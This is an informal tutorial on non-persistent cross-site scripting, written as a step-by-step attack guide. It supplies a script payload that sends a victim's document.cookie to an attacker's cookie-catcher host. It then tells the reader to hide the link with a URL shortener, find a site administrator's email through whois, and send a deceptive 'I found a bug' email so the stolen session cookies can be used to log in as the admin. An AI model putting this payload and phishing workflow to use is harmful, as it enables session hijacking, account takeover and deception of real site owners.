Types of XSSThere are actually three types of Cross-Site Scripting, commonly named as:
- Persistent X
- Non-persistent XSS
- DOM-Based XSS
S0 in diz tutorial i will be concentrating on Non-Persistent method :D
The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.
Finding a XSS Vulnerable sitesFirst of all,we need to find sites which are vulnerable to XSS attack.There are many such sites.
To find XSS vulnerable sites add a code after the link.Add below given codes after the site link to find whether the site is vulnerable or not :
Or a new one which i found out myself which you can inject HTML:
After adding these codes after the link if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script> and now press Enter.
- After finding the site check for its search box , it must be like this search.php and now you have to check whether this search.php is vulnerable or not.
- To check this add this simple code in the search box and click the search button.
- After searching this code if a box popup it means this search.php is vulnerable to Non-Persistent XSS attack.
- Now after confirming the vulnerability add the below code in the url of this search.php page.
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
- Now we have to shrink the link of whole page for this use tinyurl or any other such service.
- Now try to find a site administrator's E-mail,for this you may use whois lookup table or any online service which gives you the detail of the site's owner
- After getting the email id send him a fake email from any online fake mailer or through your fake id.
- In the body of the email just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php in which you have also added the code.
- Tinyurl will mask the link and don't let it to go to spam
- Once he clicked on that link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher.
- No matter what he does and changes his password you can still login as him.